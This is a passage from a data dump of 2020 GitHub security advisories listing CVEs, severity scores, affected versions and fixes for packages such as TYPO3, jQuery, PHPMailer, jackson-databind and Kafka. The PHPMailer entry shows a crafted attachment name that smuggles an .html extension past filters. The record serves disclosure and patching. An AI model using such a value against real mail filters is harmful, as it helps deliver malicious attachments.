+Check out this issue (https://github.com/TooTallNate/Java-WebSocket/issues/1019#issuecomment-628507934) for more information and a way to suppress the warning.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.java-websocket:Java-WebSocket'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/TooTallNate/Java-WebSocket/security/advisories/GHSA-gw55-jm4h-x339'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11050'}, {'type': 'PACKAGE', 'url': 'https://github.com/TooTallNate/Java-WebSocket'}]","{'cwe_ids': ['CWE-295', 'CWE-297'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-08T18:54:10Z', 'nvd_published_at': '2020-05-07T21:15:00Z'}"
+1.4.0,GHSA-pqg8-crx9-g8m4,2021-11-08T18:49:16Z,2020-05-13T23:40:09Z,,['CVE-2020-11069'],Backend Same-Site Request Forgery in TYPO3 CMS,"> ### Meta
+> * CVSS v3.1: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
+> * CWE-352
+> * CWE-346
+
+### Problem
+It has been discovered that backend user interface and install tool are vulnerable to same-origin request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server - scripts are then executed with the privileges of the victims' user session.
+
+In a worst case scenario new admin users can be created which can directly be used by an attacker. The vulnerability is basically a cross-site request forgery (CSRF) triggered by a cross-site scripting vulnerability (XSS) - but happens on the same target host - thus, it’s actually a same-origin request forgery.
+
+Malicious payload such as HTML containing JavaScript might be provided by either an authenticated backend user or by a non-authenticated user using a 3rd party extension - e.g. file upload in a contact form with knowing the target location.
+
+The attacked victim requires an active and valid backend or install tool user sessions at the time of the attack to be successful.
+
+### Solution
+Update to TYPO3 versions 9.5.17 or 10.4.2 that mitigates the problem described.
+
+### Additional Considerations
+
+The deployment of additional mitigation techniques is suggested as described below.
+
+#### Sudo Mode Extension
+
+This TYPO3 extension intercepts modifications to security relevant database tables, e.g. those storing user accounts or storages of the file abstraction layer. Modifications need to confirmed by again by the acting user with providing their password again - this technique is known as ""sudo mode"". This way unintended actions happening in the background can be mitigated.
+
+* https://github.com/FriendsOfTYPO3/sudo-mode
+* https://extensions.typo3.org/extension/sudo_mode
+
+#### Content Security Policy
+
+[Content Security Policies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) tell (modern) browsers how resources served a particular site are handled - it also it possible to disallow script executions for specific locations. In a TYPO3 context it is suggested to disallow direct script execution at least for locations `/fileadmin/` and `/uploads/`.
+
+```
+# in fileadmin/.htaccess
+
+ Header add Content-Security-Policy ""default-src 'self'; script-src 'none';""
+
+```
+
+### Credits
+Thanks to Matteo Bonaker who reported this issue and to TYPO3 security team member Oliver Hader who fixed the issue.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-006","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-pqg8-crx9-g8m4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11069'}]","{'cwe_ids': ['CWE-346', 'CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T23:38:41Z', 'nvd_published_at': '2020-05-14T00:15:00Z'}"
+1.4.0,GHSA-q4m3-2j7h-f7xw,2023-09-08T21:03:13Z,2020-05-20T16:18:01Z,,['CVE-2020-7656'],Cross-Site Scripting in jquery,"Versions of `jquery` prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove ``, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.9.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7656'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/blob/9e6393b0bcb52b15313f88141d0bd7dd54227426/src/ajax.js#L203'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#220-19-january-2013'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L7481'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-7656.yml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200528-0001/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JQUERY-569619'}, {'type': 'WEB', 'url': 'https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1?language=en_US'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-20T16:17:45Z', 'nvd_published_at': '2020-05-19T21:15:00Z'}"
+1.4.0,GHSA-jjjr-3jcw-f8v6,2021-01-08T20:20:13Z,2020-05-07T18:04:53Z,,['CVE-2020-11037'],Potential Observable Timing Discrepancy in Wagtail,"### Impact
+A potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's ""Privacy"" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. (This is [understood to be feasible on a local network, but not on the public internet](https://groups.google.com/d/msg/django-developers/iAaq0pvHXuA/fpUuwjK3i2wJ).)
+
+Privacy settings that restrict access to pages / documents on a per-user or per-group basis (as opposed to a shared password) are unaffected by this vulnerability.
+
+### Patches
+Patched versions have been released as Wagtail 2.7.3 (for the LTS 2.7 branch), Wagtail 2.8.2 and Wagtail 2.9.
+
+### Workarounds
+Site owners who are unable to upgrade to the new versions can use [user- or group-based privacy restrictions](https://docs.wagtail.io/en/stable/advanced_topics/privacy.html) to restrict access to sensitive information; these are unaffected by this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/security/advisories/GHSA-jjjr-3jcw-f8v6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11037'}]","{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-07T18:04:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7hx-fqxw-rvvj,2023-01-20T22:02:41Z,2020-05-27T16:37:02Z,,['CVE-2020-13625'],Insufficient output escaping of attachment names in PHPMailer,"### Impact
+CWE-116: Incorrect output escaping.
+
+An attachment added like this (note the double quote within the attachment name, which is entirely valid):
+
+ $mail->addAttachment('/tmp/attachment.tmp', 'filename.html"";.jpg');
+
+Will result in a message containing these headers:
+
+ Content-Type: application/octet-stream; name=""filename.html"";.jpg""
+ Content-Disposition: attachment; filename=""filename.html"";.jpg""
+
+The attachment will be named `filename.html`, and the trailing `"";.jpg""` will be ignored. Mail filters that reject `.html` attachments but permit `.jpg` attachments may be fooled by this.
+
+Note that the MIME type itself is obtained automatically from the *source filename* (in this case `attachment.tmp`, which maps to a generic `application/octet-stream` type), and not the *name* given to the attachment (though these are the same if a separate name is not provided), though it can be set explicitly in other parameters to attachment methods.
+
+### Patches
+Patched in PHPMailer 6.1.6 by escaping double quotes within the name using a backslash, as per RFC822 section 3.4.1, resulting in correctly escaped headers like this:
+
+ Content-Type: application/octet-stream; name=""filename.html\"";.jpg""
+ Content-Disposition: attachment; filename=""filename.html\"";.jpg""
+
+### Workarounds
+Reject or filter names and filenames containing double quote (`""`) characters before passing them to attachment functions such as `addAttachment()`.
+
+### References
+[CVE-2020-13625](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13625).
+[PHPMailer 6.1.6 release](https://github.com/PHPMailer/PHPMailer/releases/tag/v6.1.6)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [the PHPMailer repo](https://github.com/PHPMailer/PHPMailer/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-f7hx-fqxw-rvvj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13625'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/c2796cb1cb99d7717290b48c4e6f32cb6c60b7b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/PHPMailer/PHPMailer'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v6.1.6'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/06/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EFM3BZABL6RUHTVMXSC7OFMP4CKWMRPJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SMH4TC5XTS3KZVGMSKEPPBZ2XTZCKKCX/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4505-1/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html'}]","{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-27T16:34:44Z', 'nvd_published_at': '2020-06-08T17:15:00Z'}"
+1.4.0,GHSA-p43x-xfjf-5jhr,2023-09-14T15:34:32Z,2020-05-15T18:59:01Z,,['CVE-2020-9548'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9548'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2634'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200904-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:24:13Z', 'nvd_published_at': '2020-03-02T04:15:00Z'}"
+1.4.0,GHSA-5mh9-r3rr-9597,2021-08-25T21:12:09Z,2020-05-21T21:08:33Z,,['CVE-2020-5529'],Code execution vulnerability in HtmlUnit,"HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sourceforge.htmlunit:htmlunit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.37.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5529'}, {'type': 'WEB', 'url': 'https://github.com/HtmlUnit/htmlunit/commit/bc1f58d483cc8854a9c4c1739abd5e04a2eb0367'}, {'type': 'PACKAGE', 'url': 'https://github.com/HtmlUnit/htmlunit'}, {'type': 'WEB', 'url': 'https://github.com/HtmlUnit/htmlunit/releases/tag/2.37.0'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN34535327/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2cd7f8e61dc6b8a2d9065094cd1f46aa63ad10f237ee363e26e8563@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00023.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4584-1/'}]","{'cwe_ids': ['CWE-665'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:25:38Z', 'nvd_published_at': '2020-02-11T12:15:00Z'}"
+1.4.0,GHSA-6jmf-mxwf-r3jc,2021-06-15T17:25:57Z,2020-05-12T00:39:27Z,,['CVE-2019-12399'],Exposure of Sensitive Information to an Unauthorized Actor in Apache Kafka,"When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kafka:kafka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kafka:kafka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kafka:kafka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kafka:kafka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12399'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e3a613705d70950aca2bfe9a6265c87503921852d9a3dbce512ca9f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d390dec5f360ec8aa294bef18e1a4385e2a3698d747209216f5a48b@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3154f5adbc905f1f9012a92240c8e00a96628470cc819453b9606d0e@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3203d7f25a6ca56ff3e48c43a6aa7cb60b8e5d57d0eed9f76dc2b7a8@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r47c225db363d1ee2c18c4b3b2f51b63a9789f78c7fa602e5976ecd05@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b20b40c40d4a4c641e2ef4228098a57935e5782bfdfdf3650e48265@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d9e87cdae99e98d7b244cfa53d9d2532d368d3a187fbc87c493dcbe@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r56eb055b544931451283fee51f7e1f5b8ebd3085fed7d77aaba504c9@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9%40%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6af5ed95726874e9add022955be83c192428c248d1c9a1914aff89d9@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6fa1cff4786dcef2ddd1d717836ef123c878e8321c24855bad24ae0f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r801c68bf987931f35d2e24ecc99f3aa2850fdd8f5ef15fe6c60fecf3@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8890b8f18f1de821595792b58b968a89692a255bc20d86d395270740@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9871a4215b621c1d09deee5eba97f0f44fde01b4363deb1bed0dd160@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc27d424d0bdeaf31081c3e246db3c66e882243ae3f342dfa845e0261@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rda253155601968331b5cf0da4f273813bbd91843c2568a8495d1c662@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde947ee866de6687bc51cdc8dfa6d7e6b3ad4ce8c708c344f773e6dc@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe90ca0463c199b99c2921410639aed53a172ea8b733eab0dc776262@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKAFKA-541854'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/01/14/1'}]","{'cwe_ids': ['CWE-319'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-11T20:29:01Z', 'nvd_published_at': '2020-01-14T15:15:00Z'}"
+1.4.0,GHSA-jc8m-cxhj-668x,2023-05-16T16:16:57Z,2020-05-07T21:16:46Z,,['CVE-2020-11052'],Improper Restriction of Excessive Authentication Attempts in Sorcery,"### Impact
+Brute force vulnerability when using password authentication via Sorcery. The brute force protection submodule will prevent a brute force attack for the defined lockout period, but once expired protection will not be re-enabled until a user or malicious actor logs in successfully. This does not affect users that do not use the built-in brute force protection submodule, nor users that use permanent account lockout.
+
+### Patches
+Patched as of version `0.15.0`.
+
+### Workarounds
+Currently no workarounds, other than monkey patching the authenticate method provided by Sorcery or upgrading to version `0.15.0`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'sorcery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11052'}, {'type': 'WEB', 'url': 'https://github.com/Sorcery/sorcery/issues/231'}, {'type': 'WEB', 'url': 'https://github.com/Sorcery/sorcery/pull/235'}, {'type': 'WEB', 'url': 'https://github.com/Sorcery/sorcery/commit/0f116d223826895a73b12492f17486e5d54ab7a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sorcery/sorcery'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/sorcery/CVE-2020-11052.yml'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-07T21:16:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rjvg-q57v-mjjc,2021-08-25T21:05:59Z,2020-05-06T19:51:02Z,,['CVE-2019-12398'],XSS in Apache Airflow,"In Apache Airflow before 1.10.5 when running with the ""classic"" UI, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. The new ""RBAC"" UI is unaffected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12398'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/blob/1.10.5/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72487ad6b23d18689896962782f8c93032afe5c72a6bfd23b253352b%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72487ad6b23d18689896962782f8c93032afe5c72a6bfd23b253352b@%3Cdev.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/01/14/2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-06T19:50:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cxvr-r92m-q9hw,2021-08-25T21:14:11Z,2020-05-21T21:08:47Z,,['CVE-2020-13094'],XSS in Dolibarr,Dolibarr before 11.0.4 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13094'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr/'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog'}, {'type': 'WEB', 'url': 'https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:29:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4w97-57v2-3w44,2021-01-08T20:17:36Z,2020-05-12T00:45:24Z,,['CVE-2020-11072'],False-negative validation results in MINT transactions with invalid baton,"### Impact
+Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
+
+### Patches
+npm package [slp-validate](https://www.npmjs.com/package/slp-validate) has been patched and published as version 1.2.1.
+
+### Workarounds
+Upgrade to slp-validate 1.2.1.
+
+### References
+* slp-validate [commit](https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7)
+
+### For more information
+If you have any questions or comments about this advisory:
